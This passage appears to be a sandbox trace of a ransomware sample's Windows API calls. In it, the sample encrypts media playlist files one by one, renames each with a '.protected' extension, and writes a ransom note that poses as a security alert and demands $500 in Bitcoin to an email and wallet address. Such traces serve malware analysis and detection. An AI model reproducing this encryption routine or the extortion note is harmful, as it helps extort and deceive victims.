cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.protected") returned 145 [0085.051] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl.protected")) returned 1 [0085.052] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.052] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="Windows") returned -1 [0085.052] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="Program Files") returned -1 [0085.052] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="Program Files (x86)") returned -1 [0085.052] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="$Recycle.bin") returned 1 [0085.052] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="System Volume Information") returned -1 [0085.052] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl") returned 129 [0085.052] StrStrIW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".protected") returned 0x0 [0085.052] lstrcmpW (lpString1="09_Music_played_the_most.wpl", 
lpString2="RESTORE_FILES.txt") returned -1 [0085.052] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.052] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.053] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl") returned 129 [0085.053] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".txt") returned 0x0 [0085.053] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl") returned 129 [0085.053] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".rar") returned 0x0 [0085.053] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl") returned 129 [0085.053] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".zip") returned 0x0 [0085.053] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x401, lpOverlapped=0x0) returned 1 [0085.054] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbff, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.054] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x401, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x401, lpOverlapped=0x0) returned 1 [0085.055] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.055] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.055] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.055] CloseHandle (hObject=0x158) returned 1 [0085.055] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.protected") returned 139 [0085.055] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl.protected")) returned 1 [0085.056] FindNextFileW (in: hFindFile=0x47bb10, 
lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.056] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="Windows") returned -1 [0085.056] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="Program Files") returned -1 [0085.056] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="Program Files (x86)") returned -1 [0085.056] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="$Recycle.bin") returned 1 [0085.056] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="System Volume Information") returned -1 [0085.056] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl") returned 117 [0085.056] StrStrIW (lpFirst="10_All_Music.wpl", lpSrch=".protected") returned 0x0 [0085.056] lstrcmpW (lpString1="10_All_Music.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.056] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.056] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl") returned 117 [0085.057] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".txt") returned 0x0 [0085.057] 
lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl") returned 117 [0085.057] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".rar") returned 0x0 [0085.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl") returned 117 [0085.057] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".zip") returned 0x0 [0085.057] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x427, lpOverlapped=0x0) returned 1 [0085.062] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbd9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.062] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x427, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x427, lpOverlapped=0x0) returned 1 [0085.062] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.063] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.063] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.063] CloseHandle (hObject=0x158) returned 1 [0085.063] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync 
Playlists\\en-US\\00010C6E\\10_All_Music.wpl.protected") returned 127 [0085.063] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl.protected")) returned 1 [0085.064] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.064] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="Windows") returned -1 [0085.064] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="Program Files") returned -1 [0085.064] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="Program Files (x86)") returned -1 [0085.064] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="$Recycle.bin") returned 1 [0085.064] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="System Volume Information") returned -1 [0085.064] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl") returned 120 [0085.064] StrStrIW (lpFirst="11_All_Pictures.wpl", lpSrch=".protected") returned 0x0 [0085.064] lstrcmpW (lpString1="11_All_Pictures.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.064] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.064] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: 
pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.065] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl") returned 120 [0085.065] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".txt") returned 0x0 [0085.065] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl") returned 120 [0085.065] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".rar") returned 0x0 [0085.065] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl") returned 120 [0085.065] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".zip") returned 0x0 [0085.065] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x249, lpOverlapped=0x0) returned 1 [0085.066] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffdb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.066] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x249, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x249, lpOverlapped=0x0) returned 1 [0085.067] SetFilePointerEx (in: hFile=0x158, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.067] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.067] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.067] CloseHandle (hObject=0x158) returned 1 [0085.067] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.protected") returned 130 [0085.067] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl.protected")) returned 1 [0085.068] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.068] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="Windows") returned -1 [0085.068] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="Program Files") returned -1 [0085.068] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="Program Files (x86)") returned -1 [0085.068] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="$Recycle.bin") returned 1 
[0085.068] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="System Volume Information") returned -1 [0085.068] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl") returned 117 [0085.068] StrStrIW (lpFirst="12_All_Video.wpl", lpSrch=".protected") returned 0x0 [0085.068] lstrcmpW (lpString1="12_All_Video.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.068] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.068] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.068] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.068] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl") returned 117 [0085.068] StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".txt") returned 0x0 [0085.068] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl") returned 117 [0085.068] StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".rar") returned 0x0 [0085.069] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl") returned 117 [0085.069] 
StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".zip") returned 0x0 [0085.069] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x437, lpOverlapped=0x0) returned 1 [0085.070] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbc9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.070] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x437, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x437, lpOverlapped=0x0) returned 1 [0085.070] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.070] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.070] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.070] CloseHandle (hObject=0x158) returned 1 [0085.071] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.protected") returned 127 [0085.071] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl.protected")) returned 1 [0085.071] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0085.071] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0085.071] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\RESTORE_FILES.txt") returned 118 [0085.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0085.072] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.072] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0085.073] lstrlenA (lpString="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") returned 684 [0085.073] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.073] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.073] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
lpOverlapped=0x0) returned 1 [0085.073] CloseHandle (hObject=0x154) returned 1 [0085.073] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0085.073] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0085.073] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\RESTORE_FILES.txt") returned 109 [0085.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.074] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
